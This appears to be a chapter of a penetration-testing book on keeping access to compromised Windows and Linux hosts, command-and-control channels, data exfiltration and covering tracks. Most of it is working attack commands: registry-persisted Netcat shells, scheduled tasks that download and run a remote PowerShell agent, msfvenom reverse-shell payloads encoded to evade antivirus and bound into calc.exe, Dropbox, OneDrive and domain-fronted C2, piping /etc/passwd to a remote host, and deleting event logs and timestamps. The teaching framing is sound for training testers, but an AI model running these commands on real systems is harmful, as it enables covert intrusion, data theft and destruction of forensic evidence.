Modern attackers are not interested in exploiting a system or network and then moving on. Instead, the goal is to attack and compromise a network of value and then remain resident on the network for as long as possible. Command and control (C2) refer to the mechanisms that testers use to replicate attacker actions by persisting on a system, maintaining two-way communication, enabling data to be exfiltrated to the tester’s location, and hiding the evidence of the attack.
In the command, control, and communication phase, the attacker relies on a persistent connection with the compromised system to ensure that they can continue to maintain their control.
In this chapter, you will learn about the following topics:
To be effective, the attacker must be able to maintain interactive persistence; they must have a two-way communication channel with the exploited system (interactive) that remains on the compromised system for a long period of time without being discovered (persistence). This type of connectivity is a requirement for the following reasons:
The tool used to maintain interactive persistence is usually referred to by classic terms such as backdoor or rootkit. However, the trend toward long-term persistence by both automated malware and human attacks has blurred the meaning of traditional labels, so instead, we will refer to malicious software that is intended to stay on the compromised system for an extended period as a persistent agent.
These persistent agents perform many functions for attackers and penetration testers, including the following:
Traditionally, attackers would place a backdoor on a compromised system. If the front door provides authorized access to legitimate users, backdoor applications allow attackers to return to an exploited system and have access to services and data.
Unfortunately, classic backdoors provided limited interactivity and were not designed to be persistent on compromised systems for very long time frames. This was viewed as a significant shortcoming by the attacker community because once the backdoor was discovered and removed, there was additional work required to repeat the compromise steps and exploit the system, which was made even more difficult by forewarned system administrators defending the network and its resources.
Attackers now focus on persistent agents that are properly employed and are more difficult to detect. The first tool we will review is the venerable Netcat.
Netcat is an application that supports reading from, and writing to, network connections using raw TCP and UDP packets. Unlike packets that are organized by services such as Telnet or FTP, Netcat’s packets are not accompanied by headers or other channel information specific to the service. This simplifies communications and allows for an almost universal communication channel.
The last stable version of Netcat was released by Hobbit in 1996, and it has remained as useful as ever; in fact, it is frequently referred to as the TCP/IP Swiss Army knife. Netcat can perform many functions, including the following:
At this point, we will focus on using Netcat to create a persistent shell on a compromised system. Although the following example uses Windows as the target platform, it functions the same when used on a Unix-based platform. It should also be noted that most legacy Unix platforms include Netcat as part of the operating system.
In the example shown in Figure 13.1, we will retain the executable’s name, nc.exe
; however, it is common to rename it prior to use to minimize detection. Even if it is renamed, it will usually be identified by antivirus software; many attackers will alter or remove elements of Netcat’s source code that are not required and recompile it prior to use. Such changes can alter the specific signature that antivirus programs use to identify the application as Netcat, making it invisible to antivirus programs:
/usr/share/windows-binaries
repository. To upload it to a compromised system, enter the following command from within Meterpreter:
meterpreter> upload /usr/share/windows-binaries/nc.exe C:WINDOWSsystem32
The execution of the previous command is shown in Figure 13.1:
Figure 13.1: Uploading Netcat to the target
You do not have to place it in the system32
folder specifically; however, due to the number and diversity of file types in this folder, this is the best location for hiding a file in a compromised system.
While conducting a penetration test on one client, we identified six separate instances of Netcat on one server. Netcat had been installed twice by two separate system administrators to support network management; the other four instances were installed by external attackers and were not identified until the penetration test. Therefore, always look to see whether or not Netcat is already installed on your target!
If you do not have a Meterpreter connection, you can use Trivial File Transfer Protocol (TFTP) to transfer the file.
8888
(or any other port that you have selected, as long as it is not in use) using the following command:
meterpreter> reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32
c.exe -Ldp 8888 -e cmd.exe'
queryval
command:
meterpreter> reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
netsh
command, open a port on the local firewall to ensure that the compromised system will accept remote connections to Netcat. It is important to know the target’s operating system. The netsh advfirewall firewall
command-line context is used for Windows 10, Windows Server 2008, and later versions; the netsh firewall
command is used for earlier operating systems.shell
command at the Meterpreter prompt and then enter rule
using the appropriate command. When naming the rule
, use a name such as svchostpassthrough
that suggests that rule
is important for the proper functioning of the system.A sample command is shown as follows:
C:Windowssystem32>netsh advfirewall firewall add rule name="svchostpassthrough" dir=in action=allow protocol=TCP localport=8888
C:windowssystem32>netsh advfirewall firewall show rule name="svchostpassthrough"
The execution of the previously mentioned commands is shown in Figure 13.2:
Figure 13.2: Adding a firewall rule to allow the custom port
meterpreter> reboot
C:windowssystem32> shutdown /r /t 15
nc
at the terminal, indicate the verbosity of the connection (-v
reports basic information and -vv
reports much more information), and then enter the IP address of the target and the port number, as shown in Figure 13.3:
Figure 13.3: Successfully connecting to the persistent backdoor through Netcat
Unfortunately, there are some limitations to using Netcat. There is no authentication or encryption of transmitted data, and it is detected by nearly all antivirus software.
cryptcat
, a Netcat variant that uses Twofish encryption to secure data during transmission between the exploited host and the attacker. Twofish encryption, developed by Bruce Schneider, is an advanced symmetric block cipher that provides reasonably strong protection for encrypted data.To use cryptcat
, ensure that there is a listener ready and configured with a strong password using the following command:
kali@kali:~# cryptcat -k password -l -p 444
cryptcat
(based on the target operating system; if it’s Windows, upload a Windows binary that is available in https://github.com/pprugger/Cryptcat-1.3.0-Win-10-Release) to the compromised system and configure it to connect with the listener’s IP address using the following command:
cryptcat -k password <listener IP address> 444
Unfortunately, Netcat and its variants remain detectable by most antivirus applications. However, in case the target is a Linux system, this utility is preinstalled and pen testers can leverage them to open a port and run the backdoor. It is possible to render Netcat undetectable using a hex editor to alter the source code of Netcat.
This will help avoid triggering the signature matching action of the antivirus, but this can be a long trial-and-error process. A more efficient approach is to take advantage of Empire’s persistence mechanisms.
The Windows Task Scheduler (schtasks
) was introduced as a replacement for at.exe
in Windows XP and 2003. However, at.exe
is obsolete in the latest versions of Windows. In this section, we will use scheduled tasks to maintain persistent access to a compromised system.
Attackers can create a scheduled task on the compromised system to run the Empire agent payload from the attacker’s machine, and then provide backdoor access. schtasks
can be scheduled directly from the command prompt, as shown in Figure 13.4:
The following are the typical scheduled tasks scenarios that can be engaged by attackers to maintain persistent access to the system:
schtasks /create /tn WindowsUpdate /tr " C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.10.10.12:90/agent.ps1'))'" /sc onlogon /ru System
schtasks /create /tn WindowsUpdate /tr "'C:WindowsSystem32WindowsPowerShellv1.0powershell.exe' -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c IEX ((new-object net.webclient).downloadstring('http://10.10.10.12:90/agent.ps1'))''" /sc onstart
schtasks /create /tn WindowsUpdate /tr "'C:WindowsSystem32WindowsPowerShellv1.0powershell.exe' -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c IEX ((new-object net.webclient).downloadstring('http://10.10.10.12:90/agent.ps1'))''" /sc onidle /i 10
Attackers will ensure that the listener is always running and open for connection. To legitimize it on the network, the server would need to be set up with a valid SSL certificate running HTTPS in order not to trigger alerts in the internal security features (the firewall, IPS, or proxy).
The same task can be performed by a single-line command using the PowerShell Empire tools module persistence/elevated/schtasks
, as shown in Figure 13.5:
Figure 13.5: Creating schedule tasks on the target for persistence
Now that we have learned how to utilize the scheduled task to maintain persistence to the target, we will explore the Metasploit post exploit module.
Metasploit’s Meterpreter contains several scripts that support persistence on a compromised system. We will examine the post exploit module for placing a backdoor.
After a system has been exploited and the migrate
command has moved the initial shell to a more secure service, an attacker can invoke the windows/manage/persistence_exe
script from the Meterpreter prompt.
In the example shown in Figure 13.6, we could elect to use the REXENAME
and
REXEPATH
options, which will start persistence when a user logs in to the target system.
Successful implanting of the backdoor will run automatically when the system boots to execute the file that we have set, with a specific IP address and port.
Note that we have arbitrarily selected a port for use by persistence
; an attacker must verify the local firewall settings to ensure that this port is open or use the reg
command to open the port. As with most Metasploit modules, any port can be selected as long as it is not already in use.
The post exploit module’s persistence_exe
script places an executable file in a temporary directory. The script also adds that file to the local autorun sections of the registry. Because the post exploit module, persistence_exe
, is not authenticated and anyone can use it to access the compromised system, it should be removed from the system as soon as possible after the discovery or completion of penetration testing. To remove the script, confirm the location of the resource file for cleanup, and then execute the following resource command:
meterpreter>run multi_console_command -rc /root/.msf4/logs/persistence/<Location>.rc
The Metasploit framework can be used to create a standalone executable that can persist on a compromised system and allow interactive communications. The advantage of a standalone package is that it can be prepared and tested in advance to ensure connectivity, and encoded to bypass local antivirus software:
msfvenom
. In the example shown in Figure 13.7, the agent is configured to use a reverse_tcp
shell that will connect to the localhost at the attacker’s IP on port 443
:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -e x86/shikata_ga_nai -i 5 -f exe -o attack1.exe
The agent, named attack.exe
, will use a Win32 executable template:
Figure 13.7: Creating a backdoor exploit to connect back to the Kali Linux on a specific port
This encodes the attack1.exe
agent five times using the x86/shikata_ga_nai
encoder. Each time it is re-encoded, it becomes more difficult to detect. However, the executable also increases in size.
We can configure the encoding pattern in msfvenom
by using -b x64/other
to avoid certain characters. For example, the following characters should be avoided when encoding a persistent agent because they may result in the discovery and failure of the attack:
x00
: Represents a 0-byte addressxa0
: Represents a line feedxad
: Represents a carriage returnmsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -e x86/shikata_ga_nai -i 8 raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe
msfvenom
to an existing executable, and both the modified executable and the persistent agent will function. To bind the persistent agent to an executable such as a calculator (calc.exe
), first, copy the appropriate calc.exe
file into Kali Linux. You can download it from your existing session using Meterpreter by running meterpreter > download c:\windows\system32\calc.exe
.msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -x /root/calc.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o calc.exe
calc.exe
(to replace the original calculator if access is denied, place the file on the desktop), and then executed.Unfortunately, nearly all Metasploit-encoded executables can be detected by client antivirus or EDR software. This has been attributed to penetration testers who have submitted encrypted payloads to sites such as VirusTotal (www.virustotal.com). However, you can create an executable and then encrypt it using Veil-Evasion, as described in Chapter 10, Exploitation.
Every organization that allows file sharing with cloud services is likely to make use of either Dropbox or OneDrive. Attackers can use these file storage services to maintain persistence on compromised systems.
In this section, we will focus on using these file storage cloud services on the victim system and maintaining persistence to run C2 without having to disclose the attacker’s backend IP address by using the Empire PowerShell tool.
For companies using Dropbox, this listener serves as a highly reliable C2 channel. The dbx
post-exploitation module is preloaded in our PowerShell Empire tool, which utilizes Dropbox infrastructure. Agents communicate with Dropbox, allowing it to be used as a C2 center.
Follow these steps to set up a Dropbox stager:
KaliC2C
, hit Create app, and tick the box to accept the terms and conditions.Figure 13.8: Generating the dropbox access token
> listeners
> uselistener dbx
> set apitoken <yourapitoken>
> usestager multi/launcher dropbox
> execute
The output should be as shown here:
Figure 13.9: Successfully creating the Dropbox listener in PowerShell Empire
If the API token is correct and everything works, the Dropbox account should now show a folder named Empire
, with three subfolders called results
, staging
, and taskings
, as shown in Figure 13.10:
Figure 13.10: Folders generated within the Dropbox
Attackers can make use of any free file hosting service to store the payload and get the victim machines to download and execute the agent. A successful agent will report to Empire, as shown in Figure 13.11:
Figure 13.11: Successful interaction from the target to our listener using the Dropbox API
OneDrive is another popular file-sharing service, similar to Dropbox. In the latest version of Empire, you should be able to see an additional prebuilt listener, onedrive
, as shown in Figure 13.12:
Figure 13.12: PowerShell Empire OneDrive listener options
Set up the onedrive
C2C as follows:
https://login.live.com/oauth20_desktop.srf
with the redirect URI so that PowerShell Empire can authenticate using the offline desktop module, as shown in Figure 13.13. Finally, click on Register:
Figure 13.13: Registration of KaliC2C in Azure for offline authentication
Figure 13.14: Client ID generation within the Azure portal
ClientID
, we will need to create a ClientSecret
. Navigate to Certificates & Sections under the Manage section within the same page and, under Client secrets, click on New client secret. That should bring up another window, enter any description, by default, expiry should point to 6 months, and finally click on Add. This should generate our Client Secret ID, as shown in Figure 13.15:
Figure 13.15: Creating a Secret ID for the ClientID
ClientID
to the Application ID from step 3, set the ClientSecret
to the Secret ID value from step 4, and execute the listener, as shown in Figure 13.16:
Figure 13.16: Configuring our PowerShell Empire with the ClientID and SecretValue that we created
Figure 13.17: Authentication token generation in the browser
Figure 13.18: Setting the AuthCode and starting the OneDrive listener
Empire
with three subfolders, called results
, staging
, and taskings
, in your OneDrive, with the correct Client ID and authentication code, as shown here:
Figure 13.19: Folders that are created in OneDrive once the listener started
usestager multi/launcher
and setting the listener
to onedrive
and then executing the payload. Once the payload is executed successfully on the target, this should listen on the OneDrive listener, as shown in Figure 13.20:
Figure 13.20: Agent successfully reporting back to the PowerShell Empire over the OneDrive API
Attackers can also leverage the Covenant C2 framework for penetration testing operations to maintain access to the target environment. This framework is written in .NET and is by Ryan Cobb of SpecterOps. This framework utilizes a majority of the open source features and plugins to perform different exploitations on the target with access. To install the Covenant C2 framework in Kali Linux, the following steps are involved:
sudo git clone --recurse-submodules https://github.com/cobbr/Covenant
.sudo wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
.sudo dpkg -i packages-microsoft-prod.deb
.sudo apt-get update && sudo apt-get install -y apt-transport-https && sudo apt-get update && sudo apt-get install -y dotnet-sdk-3.1
.cd Covenant/Covenant
, and run sudo dotnet build
and sudo dotnet run
.7443
:
Figure 13.21: Covenant starting in Kali using dotnet
ConnectAddresses
reflects the right IP address of the Kali Linux where the grunts can call back:
Figure 13.22: Configuring the Covenant connect back address
Figure 13.23: Setting the right listener and generating the payload in the PowerShell Launcher section
Figure 13.24: Indication of victim connecting the Covenant C2
Figure 13.25: Interacting with the target using the Covenant Interact section
Covenant allows testers to leverage all the post-exploit and lateral movement modules within the tool during penetration testing to capture the crown jewels or to exfiltrate confidential database files.
One other C2 that pen testers can also leverage is PoshC2. It is a proxy-aware C2 framework that comes in very handy for post-exploitation and lateral movement. The tool is written in Python3, and the latest version as of December 2021 is 7.4.0. The tool has gone through significant improvements over the years.
It is possible to add your own modules and tools. By default, the PoshC2 installation comes with PowerShell, C#, Python3, C++, DLLs, and shellcode. The exploit payloads injected within PoshC2 are called implants. These implants work on pretty much all operating systems, including Windows, *nix, and OSX.
The following are the steps involved in successfully setting up a PoshC2 on Kali Linux:
git clone --recursive
(https://github.com/nettitude/PoshC2) and cd PoshC2
and run sudo ./Install.sh
.sudo posh-project –n nameoftheproject
./var/Poshc2/<nameoftheproject>/configure.yml
and edit the right PayloadCommsHost
to the right IP address or domain name. You can also choose to enter the domain’s front header (we will learn how to use the domain front in the next section).sudo posh-server
in the terminal and you should be able to see the confirmation as seen in Figure 13.26, with all the payloads and their relevant location details:
Figure 13.26: Successfully launching the PoshC2 server
sudo posh –u <username>
in the Kali Linux terminal. They should be able to see the implant reporting to the server as seen in Figure 13.27. Similar to Metasploit, pen testers can now use the number of the implant to interact with the target:
Figure 13.27: Target reporting to the PoshC2 server as an implant
Although the majority of antivirus/EDR software can detect the payload, attackers can always leverage tools such as PyFuscator
to scramble the payload for PowerShell, successfully evade detection, and quickly migrate to a legitimate process.
Domain fronting is a technique engaged by attackers or red teams to avoid detection of their C2 servers. It is the art of hiding the attacker’s machine behind highly trusted domains by routing the traffic through an application utilizing someone else’s domain name (or, in the case of HTTPS, someone else’s SSL certificate).
The most popular services include Amazon’s CloudFront, Microsoft Azure, and Google App Engine. The same domain fronting techniques can be used on corporate webmail for C2 and data exfiltration through SMTP protocols.
Note that Google and Amazon both implemented strategies to guard against domain fronting in April 2018. In this section, we will explore how to use Amazon CloudFront and Microsoft Azure for C2, using two different methods.
In order to improve download speed, Amazon provides a content delivery network (CDN) on a globally distributed network of proxy servers that caches content such as bulky media and videos. Amazon CloudFront is a CDN offered by Amazon Web Services. The following steps are involved in creating a CDN:
/
.TLS v1.2
, TLS v1.1
and TLS v1.0
are enabled.Figure 13.28: Enabling the legacy cache settings and selecting the right options in AWS
<somerandom>.cloudfront.net
:
Figure 13.29: Successfully creating a cloud front distribution
It normally takes around 5 minutes or less to bring up the distribution.
posh-project –n domfront
and then make changes to the configuration file by locating to /var/poshc2/domfront/config.yml
and editing PayLoadCommsHost
to the vulnerable host, DomainFrontHeader
to your AWS cloud distribution hostname, and then BindPort
to 80
, as seen in Figure 13.30:
Figure 13.30: Configuring the PoshC2 to run on port 80 along with the domain front header with a vulnerable host
Attackers can choose to run the C2 on port 443
. Ensure that you create the right certificate by using services such as Letsencrypt, or the CloudFront CDN will not be able to establish communication with the C2 server.
Figure 13.31: Launching PoshC2 using the AWS cloud distribution that we created
In this example, we will use the vijayvelu.com
host to forward the domain request to our C2 server. Before connecting to Amazon Web Services, the application will perform a DNS lookup to resolve the domain name to a network IP address. The request will go directly to the vijayvelu.com
host with the host header that we created in the Amazon CloudFront distribution.
A packet capture of the request from Wireshark will look similar to Figure 13.32:
Figure 13.32: TCP stream of the communication of DomainFrontHost to our hosting server
Figure 13.33: Successful implanting of the exploit to the target with domain fronting
Attackers can also leverage Metasploit. We will create an exploit to provide a Meterpreter reverse HTTP shell using msfvenom
, with the domain that does the forwarding, with our header injection as follows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https lhost=<VULNERABLEHOST> lport=443 httphostheader=< CloudFront address> -e x86/shikata_ga_nai -i 8 raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o Domainfront.exe
Execution of this payload should get a reverse shell on the C2 server that is behind the Amazon CDN. This technique was actively utilized by APT29 (a Russian nation-state hacking group) to perform covert attacks:
Attackers may choose to utilize Microsoft CDN services for C2. Unfortunately, the CDN options are not available for free-tier users; hence users may have to register with the pay-as-you-go option and then create a subscription and follow the instructions at https://docs.microsoft.com/en-us/azure/cdn/cdn-create-endpoint-how-to. However, testers need to ensure that the domain name behind either Azure or Amazon has a valid A record. For Microsoft Azure, you also need to ensure that the CNAME is pointed to the right custom domain to make domain fronting work.
Although many content providers are vulnerable to this type of attack, some of the content providers, such as Google, seem to have quickly fixed this attack by making major changes to their cloud infrastructure. For example, if Company A’s domain uses Amazon’s domain as a front, with an additional host header pointing to Company B, the request will be dropped at the first node of the CDN.
Similarly, other providers are trying to block these forward or fronting techniques by requiring an additional authorization token or another mechanism.
The unauthorized transfer of digital data from any environment is known as the exfiltration of data (or the extrusion of data). Once persistence is maintained on a compromised system, a set of tools can be utilized to exfiltrate data from highly secure environments.
In this section, we will explore different methods that attackers utilize to send files from internal networks to attacker-controlled systems.
Firstly, we will discuss some straightforward techniques for quickly grabbing files when access to compromised systems is time-limited. Attackers can simply open up a port using Netcat by running nc -lvp 2323 > Exfilteredfile
, and then run cat /etc/passwd | telnet remoteIP 8000
from the compromised Linux server.
This will display the entire contents of etc/passwd
to the remote host. As an example, we are extracting a password list from the internal host to a remote Kali machine on AWS, as seen in Figure 13.35:
Figure 13.35: Exfiltration of data from a local Kali system to a remote Kali system using Telnet
Another important and fairly simple technique used by attackers with access to any system on the network is to run getgui
from the Meterpreter shell, which will enable the RDP. Once the RDP is enabled, attackers can configure their Windows attack to mount the local drive to the remote drive and exfiltrate all the files from the remote desktop to the local drive.
This can be achieved by going to Remote Desktop Connection and selecting Show Options, then Local Resources, then Local devices and resources, clicking More, and finally selecting the drive that you want to mount, as shown in Figure 13.36:
Figure 13.36: Options in RDP settings to mount the drives
This will mount the D://
drive of the attacker’s local machine to the RDP system. This can be confirmed by logging in to the remote IP using the RDP connection. An additional drive (X:
) should be mounted by default, as shown in Figure 13.37:
Figure 13.37: Successfully mounting the attacker’s local drive to the remote desktop
Other traditional techniques involve setting up an SMB server and allowing anonymous access from compromised computers, or utilizing applications such as TeamViewer, the Skype Chrome plugin, Dropbox, Google Drive, OneDrive, WeTransfer, or any other one-click sharing service for bulk file transfers.
There are multiple ways to utilize the ICMP protocol to exfiltrate files, using tools such as hping
, nping
, and ping
. In this section, we will utilize the nping
utility to perform the data exfiltration of confidential documents using the ICMP protocol.
In this example, we will use tcpdump
to extract the data from the pcap
dump file. Run the following command in the terminal to enable the listener:
tcpdump -i eth0 'icmp and src host <KALI IP>' -w importantfile.pcap
Attackers should be able to see the following:
Figure 13.38 Capturing the packets to receive contents
10.10.10.12
is the target host that we are waiting to receive data from. On the sender’s side, once hping3
is fired at the client side (10.10.10.12
), you should receive the message EOF reached, wait some second than press ctrl+c
, as shown in Figure 13.39. This indicates that the file has been exfiltrated to the target server via ICMP:
Figure 13.39: Sending the file over the ICMP using the hping3 utility
Close tcpdump
using Ctrl + C. The next step is to remove the unwanted data from the pcap
file so that we print only the specific hex value to a text file by running Wireshark or tshark
.
The following is the tshark
command to filter the data fields and print just the hex value from the pcap
file:
tshark -n -q -r importantfile.pcap -T fields -e data.data | tr -d "
" | tr -d ":" >> extfilterated_hex.txt
The same hex file can now be converted with the following one-line bash command by running cat extfilterated_hex.txt | xxd –r –p
. Finally, you should be able to view the file contents, as shown in Figure 13.40:
Figure 13.40: Extraction of hex data from pcap and decoding using xxd
These techniques are being eased out by other sets of tools, such as utilizing TeamViewer, DropBox, and other cloud-hosting services.
Once a system has been exploited, the attacker must cover their tracks to avoid detection, or at least make reconstruction of the event more difficult for the defender.
An attacker may completely delete the Windows event logs (if they are being actively retained on the compromised server). This can be done via a command shell to the system, using the following command:
C:> del %WINDIR%*.log /a/s/q/f
The command directs all of the logs to be deleted (/a
), including all files from subfolders (/s
). The /q
option disables all of the queries, asking for a yes
or no
response, and the /f
option forcibly removes the files, making recovery more difficult.
To wipe out specific recorded files, attackers must keep track of all the activities that have been performed on the compromised system.
This can also be done from the Meterpreter prompt by using clearev
. As shown in Figure 13.41, this will clear the application, system, and security logs from the target (there are no options or arguments for this command):
Figure 13.41: Clearing the Event Logs in Windows
Ordinarily, deleting a system log does not trigger any alerts to the user. In fact, most organizations configure logging so haphazardly that missing system logs are treated as a possible occurrence, and their loss is not investigated thoroughly.
Apart from the traditional logs, attackers might also consider removing the PowerShell Operational log
from the victim systems.
Metasploit has an additional trick up its sleeve: the timestomp
option allows an attacker to make changes to the MACE parameters of a file (the last modified, accessed, created, and MFT entry modified times of a file). Once a system has been compromised and a Meterpreter shell established, timestomp
can be invoked, as shown in Figure 13.42:
Figure 13.42: Meterpreter timestomp options
For example, C:
of the compromised system contains a file named README.txt
. The MACE values for this file indicate that it was created recently, as shown in Figure 13.43:
Figure 13.43: Running timestomp on a specific local file
If we wanted to hide this file, we could move it to a cluttered directory, such as WindowsSystem32
. However, the file would be obvious to anyone who sorted the contents of that directory on the basis of the creation dates or another MAC-based variable.
Instead, you can change the timestamps of the file by running the following command:
meterpreter > timestomp -z "01/01/2001 10:10:10" README.txt
This changes the timestamps of the README.txt
file, as shown in Figure 13.44:
Figure 13.44: Modifying the metadata of the files to reflect false dates
In order to completely foul up an investigation, an attacker may recursively change all of the set times in a directory or on a particular drive using the following command:
meterpreter> timestomp C:\ -r
The solution is not perfect. It is clear that an attack has occurred. Furthermore, timestamps can be retained in other locations on a hard drive and be accessible for investigation. If the target system is actively monitoring changes to system integrity using an intrusion detection system such as Tripwire, alerts of the timestomp activity will be generated. Therefore, destroying timestamps is of limited value when a truly stealthy approach is required.
In this chapter, we took a journey into different strategies used by attackers to maintain access to compromised environments, including domain fronting to hide the origin of the attack, and we also learned how to hide the evidence of an attack to cover our tracks and remain anonymous, which is the last step of the cyber kill chain methodology.
We looked at how to use Netcat, Meterpreter, scheduled tasks, PowerShell Empire’s dbx and onedrive modules, and Covenant C2 and Poshc2 implants to maintain persistent agents on compromised systems, as well as how to exfiltrate data using traditional services such as DNS, ICMP, Telnet, RDP, and Netcat. We also learned how to find vulnerable domain fronting domains and use them for malicious activities using well-known CDNs such as Amazon and Azure.
In the next chapter, we will look at how to hack embedded and RFID/NFC devices using both existing Kali 2021.4 features and additional tools.
3.145.12.242